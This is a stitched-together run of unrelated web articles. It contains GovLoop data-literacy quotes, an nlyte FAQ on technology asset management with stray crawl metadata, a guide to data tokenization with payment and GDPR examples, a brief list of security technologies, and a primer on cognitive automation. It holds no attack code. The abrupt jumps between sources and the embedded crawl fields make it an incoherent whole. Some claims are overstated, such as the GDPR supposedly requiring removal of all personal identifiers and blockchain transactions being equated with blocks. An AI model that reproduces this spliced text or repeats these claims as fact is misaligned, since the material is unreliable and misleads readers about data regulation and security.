“Imagine you have a massive cache of digital family photos, and you’re looking for images of your child’s kindergarten graduation. Sure, it’s great having all those photos on the computer, but unless you tagged them in some way, there’s no quick way to find what you need. This dilemma mirrors how valuable information can be so difficult to find when it comes in the form of ‘unstructured data.’ Unstructured data includes images, video, audio and other types of information that cannot be stored in traditional databases or analyzed with traditional data tools. Structured data appears in rows and columns that are clearly labeled, making it easy to sort and analyze. Unfortunately, that’s not the case with unstructured data.”
Read more insights from Micro Focus Government Solutions’ Senior Solution Architect for AI/ML/Data Privacy/Data Governance, Patrick Johnson.
Finding the Solution in Unexpected Places
“Democratized analytics is the technological capability that enables data workers of various technical skill levels to leverage data and share its insights with other employees of various skill levels. Put simply, it’s analytics accessible for and inclusive to all. Unified analytics is technology that allows data workers to perform the entire analytic life cycle in one place. From data prep and blend, which identifies and combines data for descriptive, predictive and prescriptive analytics, to machine learning, an advanced form of AI that gets smarter over time — unified analytics allows a range of data transformation processes to be done in a single location, no matter the data source or type. No-code/low-code analytics is analytics that does not require coding skills to prep, clean, analyze and share data. And we’re not talking spreadsheets here.”
Read more insights from Alteryx’s Director of Solutions Marketing for the Public Sector, Andy MacIsaac.
Let’s Get Back to Basics for Collaboration
“Everyday work is more than what happens at the task level. You may think updating spreadsheets and responding to emails are low-value chores, but these and countless other tactical to-dos impact how the larger mission is carried out. How task-level activities get done reflect the health and success of strategic-level goals and initiatives. However, some federal agencies are missing out on the efficiencies and insights that can be captured at the tactical level. A survey commissioned by Smartsheet, a cloud-based work management platform provider, found that 76% of government officials estimate that using collaborative work management software could increase their organization’s efficiency. However, nearly one in three federal workers today are prevented from achieving success because their teams are siloed. Federal workers need visibility and access to information if they’re expected to collaborate with others and make informed decisions.”
Read more insights from Harvard Kennedy School’s Senior Advisor for Insight Partners and Senior Fellow, Nick Sinai.
Download the full GovLoop Guide for more insights from these data literacy thought leaders and additional government interviews, historical perspectives and industry research on the future of data.
IT Asset Management (ITAM) traditionally included assets such as servers, mainframes, routers, switches, firewalls, desktop and laptop computers, printers, and software — all things managed by IT. But technology no longer only consists of IT assets. Today, there are non-IT technology assets in organizations everywhere.
With the rise of the Internet of Things (IoT), technology is pervasive in things such as heating, ventilation, and air conditioning (HVAC) systems, devices and sensors, security cameras, medical devices, and more — all connected to the Internet and owned by different areas of the business. Thus, ITAM has evolved into Technology Asset Management (TAM).
Is ITAM – TAM more than a software asset management tool?
TAM is more than an inventory of an organization’s assets. Its importance to the organization is reinforced by the existence of various international and U.S. standards, including the following:
- International Organization for Standardization (ISO) and International Electrotechnical Commission (IEC): ITAM is defined in ISO/IEC 19770, which specifically addresses modern challenges such as security (aligned to ISO/IEC 27001), cloud services, and mobile computing. The standard covers assets including:
- Physical and digital media
- Physical and virtual IT equipment
- Licenses (including proof of license)
- ITAM system management assets (including systems, tools, and metadata)
- U.S. National Institute of Standards and Technology (NIST): NIST Special Publication 1800-5 defines a standard ITAM approach and architecture and recognizes that “ITAM is foundational to an effective cybersecurity strategy” because it “enhances visibility for security analysts, which leads to better asset utilization and security.” The NIST Framework for Improving Critical Infrastructure Cybersecurity is organized into the following five core functions:

- Identify
- Protect
- Detect
- Respond
- Recover
Within the Identify function, the Asset Management category is defined as follows: “The data, personnel, devices, systems, and facilities that enable the organization to achieve business purposes are identified and managed consistent with their relative importance to organizational objectives and the organization’s risk strategy.”
Who uses ITAM?
TAM provides tangible benefits for many different use cases across organizations, including the following:
- Finance and Procurement: TAM helps finance, procurement, and asset managers with negotiating purchases and renewals, reconciling fixed asset reports, eliminating wasted expenditures, and validating the disposition of retired assets.
- Security and Compliance: TAM identifies all things attached to the organization’s network, providing detailed information about location, configuration, accessibility monitoring for unplanned changes, unauthorized access, vulnerable software, and lost and unresponsive assets, as well as workflow audit tracking for GDPR, HIPAA, SOX, PCI DSS, and more.
- IT Operations: TAM delivers a self-aware IT infrastructure by updating CMDBs, DCIM, and building management systems (BMSs) with current asset configuration and location information, improving efficiency and SLAs for change management workflows and service desk management.
|
<urn:uuid:5a0d4b63-fa11-4c87-8884-4f5fc5d9d3d2>
|
CC-MAIN-2022-40
|
https://www.nlyte.com/faqs/what-is-it-asset-management/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335326.48/warc/CC-MAIN-20220929065206-20220929095206-00258.warc.gz
|
en
| 0.913823 | 652 | 2.515625 | 3 |
Tokenization has become a popular buzzword in the world of data security, as it can be applied to a wide range of industries and use cases. If your company stores and processes sensitive data, you need to understand how tokenization works. This guide will explain everything you need to know.
What is Tokenization Anyway?
Tokenization is the process of turning sensitive data into non-sensitive data. The sensitive data gets turned into “tokens” that retain all of the information without compromising its security.
In theory, tokenization can be applied to any type of sensitive data. This data security practice is most commonly associated with credit card processing, but it can also be used to secure medical records, bank transactions, loan applications, stock market trading, criminal records, social security numbers, and more.
Tokens have no real value on their own. They simply replace sensitive data while still allowing the data to serve its purpose.
Casino chips are a great analogy. People at a casino can play poker, blackjack, or other table games using chips that represent real money. But they can’t use those chips to buy groceries—the cash itself is protected by the token.
How Tokenization Works
In terms of data security, the tokenization process is a bit more complex. Tokens can be generated in the following ways:
- Mathematically cryptographic function with a key that’s reversible
- Nonreversible functions (like a hash function)
- A randomly generated number or an index function
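Two of these generation methods are easy to sketch in a few lines of Python. The card number below is fake, and a real reversible scheme would use a vetted format-preserving encryption library rather than anything hand-rolled:

```python
import hashlib
import secrets

pan = "4111111111111111"  # a fake card number for illustration

# Nonreversible function: hashing always maps the same input to the same
# token, but there is no way back to the original without a lookup table.
hash_token = hashlib.sha256(pan.encode()).hexdigest()[:16]

# Randomly generated token: no mathematical relationship to the input at
# all, so a token vault must remember which value it stands for.
random_token = secrets.token_hex(8)

print(hash_token, random_token)
```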
Once the tokenization process has been completed, the tokens represent a safe way to use the data—tokens are nonsensitive. The sensitive data is stored in a centralized server called a “token vault.” Token vaults are the only way to map sensitive data back to corresponding tokens.
For reversible tokens, the data is not typically stored in a vault. Instead, vaultless tokenization keeps the sensitive data secure with an algorithm.
The terms tokenization and encryption are commonly associated with each other, although the two data security methods are not the same.
Encryption uses an algorithm to transform information into a non-readable format. To access the encrypted data, you need to have an encryption key.
The purpose of encryption is to protect sensitive information from anyone for whom the data is not intended. Even if someone were to access the encrypted data, they would have no way to decipher it without a key.
Tokens are just a placeholder for sensitive data (remember, think casino chips). The actual data associated with that token is stored elsewhere. If a hacker steals the tokens, they have no value—the data doesn’t reside in the same environment as the token.
To truly understand tokenization, you must also get familiar with the term “detokenization.”
As the name implies, detokenization is the reverse process that exchanges the token for its original value. The only way to perform detokenization is through the original tokenization system—there’s no other way to retrieve the original data using just the token.
Tokens work well for one-time uses, like payment transactions, that don’t need to be stored beyond their initial use. But they also work well for high-value items, such as keeping a credit card on file for recurring transactions.
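A toy version of vault-based tokenization and detokenization, with a plain dictionary standing in for the hardened token vault a real system would use:

```python
import secrets

class TokenVault:
    """Maps random tokens to sensitive values. The token itself carries
    no information; only the vault can reverse the exchange."""

    def __init__(self):
        self._vault = {}  # token -> original value

    def tokenize(self, value):
        token = secrets.token_hex(8)  # random, meaningless on its own
        self._vault[token] = value
        return token

    def detokenize(self, token):
        # Only the tokenization system can map a token back to its value.
        return self._vault[token]

vault = TokenVault()
token = vault.tokenize("4111 1111 1111 1111")
assert token != "4111 1111 1111 1111"               # token reveals nothing
assert vault.detokenize(token) == "4111 1111 1111 1111"
```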
Tokenization ultimately keeps sensitive data safe from both internal and external threats. In many instances, tokenization can be used as a way to stay compliant with regulations like PCI DSS, GDPR, HIPAA, and more.
Let’s take a close look at some real-world examples of tokenization in use:
Example #1: Credit Card Processing
The most common use case for tokenization is credit card processing. Businesses that process credit cards must remain PCI compliant. Otherwise, they can be hit with hefty fines or lose the right to process credit cards altogether.
According to PCI standards, credit card numbers can’t be stored within a POS system or a database after a transaction.
In this scenario, businesses can use a payment service provider that takes the card information and turns it into a token. Since the tokens themselves don’t actually contain the cardholder data, they are useless to anyone with malicious intent.
Employees, hackers, or cybercriminals attempting to steal credit card numbers won’t have any luck if they get their hands on tokens.
With credit card processing, it’s common for the tokens to be kept in a preserved format. For example, the number of characters in the token will be identical to the card number, and the last four digits of the card will be visible.
This format is useful for general business operations. A customer may ask an employee what card they have on file, and the employee could give an appropriate answer like “Visa ending in 6789.”
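The preserved format described above can be sketched like so. The replacement digits here are simply random, and real payment tokens are issued by the processor rather than generated in-house:

```python
import random

def format_preserving_token(card_number):
    """Replace all but the last four digits with random digits, keeping
    the card number's length and separators intact."""
    digits = [c for c in card_number if c.isdigit()]
    keep_from = len(digits) - 4  # randomize everything before the last four
    out, seen = [], 0
    for c in card_number:
        if c.isdigit():
            out.append(str(random.randint(0, 9)) if seen < keep_from else c)
            seen += 1
        else:
            out.append(c)  # preserve spaces and dashes as-is
    return "".join(out)

token = format_preserving_token("4111-1111-1111-6789")
print(token)  # the last four digits survive, e.g. "xxxx-xxxx-xxxx-6789"
```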
In addition to the storage of credit cards, tokenization is also used to validate card transactions.
When a credit card gets swiped or entered into an ecommerce site, a lot goes on behind the scenes. The card data passes through the credit card processor, acquiring bank, card network, and issuing bank before ultimately getting sent back to the merchant with an “approve” or “deny” message.
But the card number itself isn’t used as the information changes hands—the number is turned into a token. Once the token reaches the card network, they check the token vault to verify the account number before sending the token back down the line.
All of this happens in a matter of seconds and keeps the sensitive cardholder data secure as the transaction gets processed.
Example #2: Blockchain
Blockchain has been a hot topic since the explosion of cryptocurrency, although the concept of blockchain dates back decades before crypto was invented.
With blockchain, tokens become a digital representation of real-world assets. These are known as security tokens or asset tokens.
For centralized economic models, banks and financial institutions are responsible for managing the integrity of the transaction ledger. But for decentralized scenarios, like cryptocurrency, the responsibility shifts to the individual users involved with the transaction.
Tokens in a blockchain are linked back to the real-world asset. Each transaction, or block in the chain, is dependent on other transactions in the chain for verification.
Any tokenized asset in a blockchain can be traced back to the asset that it represents while keeping the data associated with that asset secure.
Example #3: Customer Data Storage Compliance
Laws and industry-specific regulations are tightening in various jurisdictions. Two common examples include HIPAA (Health Insurance Portability and Accountability Act) and GDPR (General Data Protection Regulation).
HIPAA defines how patient records must be stored and shared in the healthcare space, and GDPR is for consumer data protection in the European Union.
Let’s take a closer look at GDPR and how tokenization can be used here for compliance. Just know that the same concept can be applied to any regulation or data security practice with similar information.
The GDPR requires businesses to remove all personal identifiers associated with the customer data that they’re storing. For example, a person’s name, phone number, or address can’t be stored with their transaction history.
To remain compliant, organizations must put that data through a process called pseudonymization. Tokenization is one way to accomplish pseudonymization, as it takes the personal identifiers of consumer data and turns them into tokens.
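One sketch of pseudonymization via tokens: direct identifiers are swapped for opaque tokens, and the mapping is kept apart from the working data set. The field names below are invented for illustration:

```python
import secrets

def pseudonymize(record, identifier_fields):
    """Swap direct identifiers for opaque tokens. The mapping is returned
    separately so it can be stored away from the analytics copy."""
    mapping = {}
    safe = dict(record)
    for field in identifier_fields:
        token = "tok_" + secrets.token_hex(4)
        mapping[token] = safe[field]
        safe[field] = token
    return safe, mapping

record = {"name": "Ana Weber", "phone": "+49 151 000", "total_spend": 412.50}
safe, mapping = pseudonymize(record, ["name", "phone"])
assert safe["total_spend"] == 412.50        # analytics fields untouched
assert safe["name"].startswith("tok_")      # identifier replaced
assert mapping[safe["name"]] == "Ana Weber" # reversible only via the mapping
```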
Example #4: User Authentication
Tokens can also be used to verify the identity of users, adding an extra layer of security to access sensitive information.
For websites and applications that require a username and password, one-time tokens can be generated and stored in the browser. This provides the user access to other pages on the domain for a specified period of time without needing to re-authenticate themselves on every page.
Once the session is over, the token is destroyed. So the account remains secure.
- Accessing an account from a single-use text or email code
- Logging into a third-party website using Gmail credentials
- Unlocking a smartphone or app with a fingerprint
These are all common examples of token-based authentication that we’ve all seen on a regular basis.
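A minimal sketch of token-based session authentication follows; a production system would add secure storage, renewal, and explicit revocation:

```python
import secrets
import time

SESSIONS = {}  # token -> (username, expiry timestamp)

def issue_token(username, ttl_seconds=900):
    """Create a random session token valid for a limited window."""
    token = secrets.token_urlsafe(16)
    SESSIONS[token] = (username, time.time() + ttl_seconds)
    return token

def authenticate(token):
    """Return the username for a live token, or None if it is unknown
    or expired (expired tokens are destroyed on sight)."""
    entry = SESSIONS.get(token)
    if entry is None or time.time() > entry[1]:
        SESSIONS.pop(token, None)
        return None
    return entry[0]

tok = issue_token("ana")
assert authenticate(tok) == "ana"       # valid within the session window
assert authenticate("forged") is None   # a made-up token is worthless
```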
Example #5: Physical Asset Exchange
Art tokenization is a really unique example, but I wanted to include it to showcase the versatility of tokens. Here’s how it works.
An organization that owns a rare or valuable piece of artwork can have the work appraised to set its value. Based on this value, the artwork can be converted into digital tokens for sale on the open market.
Buyers can purchase these tokens to create a portfolio of fractional art shares and sell those tokens for profit.
Alone, the tokens hold no real value. But when authenticated through the platform managing the artwork, the token represents a fractional share of a physical asset.
JPMorgan has used this same concept to tokenize gold bars.
How to Get Started With Tokenization
Now that you understand how tokenization works, it’s time to apply this concept to your specific use case. Here are the tactical steps required to get started with tokenization:
Step 1: Identify What You Need to Secure
What are you trying to tokenize? This must be clearly defined before you continue.
As you’ve seen from the examples above, there are seemingly endless physical and digital assets that can be applied to tokenization.
Most businesses getting started with tokenization are trying to protect sensitive consumer data or payment transactions. You could also use tokenization to secure sensitive company data, such as payroll information or employee records.
Step 2: Choose a Token Generation Method
Based on the information you’re trying to protect, you need to decide how your tokens will be generated.
First, choose between single-use tokens and multi-use tokens. Single-use tokens work well for things like one-time transactions or user authentication. Multi-use tokens would be required for long-term storage—like keeping credit card data on file or storing personal customer data.
Once you’ve narrowed this down, you need to decide how the tokens will be generated.
Are you going to use a mathematically reversible cryptographic function and key? What about a hash function that’s non-reversible? Or do you want a randomly generated number?
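The three generation methods can be contrasted in a short Python sketch. The XOR cipher below is a toy stand-in for a reversible cryptographic function; real systems would use a vetted cipher such as AES or a format-preserving encryption scheme.

```python
import hashlib
import hmac
import secrets

card = "4111111111111111"
key = secrets.token_bytes(32)  # secret key held by the tokenization system

# 1. Mathematically reversible function + key (toy XOR cipher for illustration).
def xor_crypt(data: bytes, key: bytes) -> bytes:
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

reversible_token = xor_crypt(card.encode(), key).hex()
recovered = xor_crypt(bytes.fromhex(reversible_token), key).decode()
assert recovered == card  # holders of the key can detokenize

# 2. Non-reversible keyed hash: the same input always yields the same token,
#    but the original value cannot be computed back from it.
hash_token = hmac.new(key, card.encode(), hashlib.sha256).hexdigest()

# 3. Randomly generated number: no mathematical relationship to the input;
#    the token-to-value mapping must be kept in a token vault.
random_token = secrets.token_hex(16)
```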
Step 3: Select a Tokenization Provider
Now that you have a firm grasp of your needs, you’ll need a tokenization provider to make all of this happen for you. Most tokenization providers offer a wide range of options, but you need to verify that the solution you’re using fits the criteria identified in steps one and two.
Depending on the use case, choosing a provider will be fairly easy.
For example, payment processors will offer tokenization to your business if you want to start accepting credit cards. They’ll provide you with all of the hardware and technology required to process the cards, and the tokens will be generated and processed by them on the backend.
If you’re using tokenization to authenticate users or protect sensitive business data, then you’d need to use another data security solution. The process here won’t be the same as tokenization for payment processing.
Step 4: Pick a Storage Environment
With tokenization, you need to store two different things. First, you need a place to store the tokens. But you also need a place to store the original and sensitive data.
The two must not be stored in the same place; that way, if someone steals the tokens, they can’t do anything with them.
If you’re going to host the tokens in-house, you need to make sure that your environment supports this. In many cases, it’s better to just use the storage system that’s set up by your tokenization provider. They should already have the infrastructure in place to handle everything you need.
You’ll also need to decide between using a token vault or vaultless storage.
Step 5: Understand Detokenization
In many instances, tokenization is not permanent. You can ultimately exchange the token for the original sensitive data.
But this process can only occur through the platform you’re using to generate the tokens.
Let’s stick with the credit card processing example, as this is the most common use case for tokenization. If you’re keeping customer cards on file for recurring billing or faster checkouts, each time that person makes a transaction, the token must be authenticated before the payment can be processed.
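A minimal sketch of vault-based detokenization, assuming a random-token scheme. The authorization check is simplified to a boolean; a real platform would authenticate the caller cryptographically before releasing the original data.

```python
import secrets

vault = {}  # token -> card number; held only by the tokenization provider

def tokenize(card_number: str) -> str:
    """Store the real card number in the vault and return a random token."""
    token = secrets.token_hex(16)
    vault[token] = card_number
    return token

def detokenize(token: str, caller_is_authorized: bool) -> str:
    """Exchange a token for the original data. This can only happen through
    the platform that issued the token, and only for authenticated callers."""
    if not caller_is_authorized:
        raise PermissionError("detokenization refused")
    if token not in vault:
        raise KeyError("unknown token")
    return vault[token]

# A card kept on file for recurring billing is stored only as a token.
token_on_file = tokenize("4111111111111111")

# At billing time the token is authenticated, then swapped for the real card.
card = detokenize(token_on_file, caller_is_authorized=True)
assert card == "4111111111111111"
```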
Hacker attacks are increasing dramatically worldwide, and a race for supremacy has broken out between data protectors and data thieves.
Five future-oriented security technologies from which IT security teams in companies can benefit
The attacks on important company data are increasing and unfortunately, they are also very effective.
Hardware authentication
The deficits of passwords and usernames are well known. For experts, it is obvious that a more secure form of authentication is necessary. One option is to transfer validation to the user's hardware.
Hardware authentication is particularly applicable to the Internet of Things, where a network must ensure that whatever requests access is legitimately granted it.
Analysis of user behavior
Once a user's username and password have been compromised, all kinds of malicious behavior can take place on a network. This is where user behavior analytics comes into play, using big data analytics to recognize abnormal behavior by a user.
Protection against data loss
Technologies such as tokenization and encryption are key to avoiding data loss. They let you protect data not just at the field level but down to the subfield level.
This allows data to be securely moved and used across the extended enterprise. Business processes and analyses can be carried out on the data in its protected form, which drastically reduces exposure and risk.
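Subfield-level protection can be illustrated with a card number: only the middle digits are replaced, so the protected value keeps the shape that downstream business processes expect. This is a simplified sketch; real format-preserving tokenization uses standardized schemes rather than random digits.

```python
import secrets

def tokenize_pan(pan: str) -> str:
    """Tokenize a card number at the subfield level: the middle digits are
    replaced, while the first six and last four stay readable so routing,
    receipts, and analytics still work on the protected form."""
    middle = "".join(secrets.choice("0123456789") for _ in range(len(pan) - 10))
    return pan[:6] + middle + pan[-4:]

protected = tokenize_pan("4111111111111111")
assert protected[:6] == "411111" and protected[-4:] == "1111"
assert len(protected) == 16  # same length and format as a real card number
```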
Deep learning
Like user behavior analytics, deep learning focuses on abnormal behavior. It covers a range of technologies, such as machine learning and artificial intelligence (AI).
These technologies make it possible to examine the many entities that exist across an enterprise not only at the micro level but at the macro level as well. For example, a data center, as a unit, can behave much like a user.
The cloud
The cloud is not new, of course, but it will have an increasingly transformative impact on security technology in the years to come, at the latest when technologies such as virtualized systems, virtualized security hardware, and virtualized firewalls for intrusion detection are transferred to the cloud.
What Is Cognitive Automation? A Primer
Anyone who has been following the Robotic Process Automation (RPA) revolution that is transforming enterprises worldwide has also been hearing about how artificial intelligence (AI) can augment traditional RPA tools to do more than just RPA alone can achieve.
You might even have noticed that some RPA software vendors — Automation Anywhere is one of them — are attempting to be more precise with their language. Rather than call our intelligent software robot (bot) product an AI-based solution, we say it is built around cognitive computing theories.
But is that any clearer? What is cognitive automation? Confusion abounds. Let’s try and dispel some of it.
Deloitte defines cognitive automation as a subset of AI technologies that mimic human behavior: “RPA together with cognitive technologies such as speech recognition and natural language processing automate perceptual and judgment-based tasks once reserved for humans.”
IBM takes that definition and adds to it, defining cognitive computing as differing from AI in how it is used: “In an artificial intelligence system, the system tells a doctor which course of action to take based on its analysis. In cognitive computing, the system provides information to help the doctor decide.”
Combining these two definitions together, you see that cognitive automation is a subset of artificial intelligence — using specific AI techniques that mimic the way the human brain works — to assist humans in making decisions, completing tasks, or meeting goals.
Cognitive automation: AI techniques applied to automate specific business processes
Unlike other types of AI, such as machine learning, or deep learning, cognitive automation solutions imitate the way humans think. This means using technologies such as natural language processing, image processing, pattern recognition, and — most importantly — contextual analyses to make more intuitive leaps, perceptions, and judgments.
Cognitive automation is gaining steam. According to IDC, in 2017, the largest area of AI spending was cognitive applications. This includes applications that automate processes and automatically learn, discover, and make recommendations or predictions. Overall, cognitive software platforms will see investments of nearly $2.5 billion this year. Spending on cognitive-related IT and business services will be more than $3.5 billion and will enjoy a five-year CAGR of nearly 70%.
Also, according to IDC, the cognitive applications that will see the most traction in the coming year are quality management investigation and recommendation systems; diagnosis and treatment systems; automated customer service agents; automated threat intelligence and prevention systems; and fraud analysis and investigation. These five areas will capture nearly 50% of all cognitive spending.
Another way to think about cognitive automation is that it learns at least in part by association. It takes unstructured data and uses that to build relationships and create indices, tags, annotations, and other metadata. It tries to find similarities between items pertaining to specific business processes — invoices, purchase order numbers, shipping addresses, assets, liabilities, etc. Some of the questions that it uses to build these relationships include:
- Have I seen this before?
- What was done in a similar instance?
- Is it connected to something I have seen before?
- What is the strength of that connection?
- Who/what is involved?
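The first few of those questions amount to similarity scoring over previously processed items. A minimal Python sketch, using the standard library's `SequenceMatcher` as a stand-in for the richer matching a cognitive platform would apply (the invoice strings are invented for illustration):

```python
from difflib import SequenceMatcher

# Items the system has already processed and learned from.
seen_invoices = [
    "PO-2024-0017 ACME Corp 1,200.00",
    "PO-2024-0018 Globex 310.50",
]

def most_similar(new_item: str, history: list[str]) -> tuple[str, float]:
    """Answer 'Have I seen this before?' by scoring the new item against
    every previously processed item and returning the best match."""
    scored = [(old, SequenceMatcher(None, new_item, old).ratio()) for old in history]
    return max(scored, key=lambda pair: pair[1])

match, strength = most_similar("PO-2024-0017 ACME Corporation 1,200.00", seen_invoices)
# 'strength' is the strength of the connection; above some threshold the
# system can reuse what was done in the similar instance.
```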
Cognitive automation has a number of advantages over other types of AI. Cognitive automation solutions are pre-trained to automate specific business processes, so they need less data before they can make an impact, and they don't require help from data scientists or IT to build elaborate models. They are designed to be used by business users and to be operational in just a few weeks.
The coolest thing is that as new data is added to a cognitive system, the system can make more and more connections. This allows cognitive automation systems to keep learning unsupervised, and constantly adjusting to the new information they are being fed.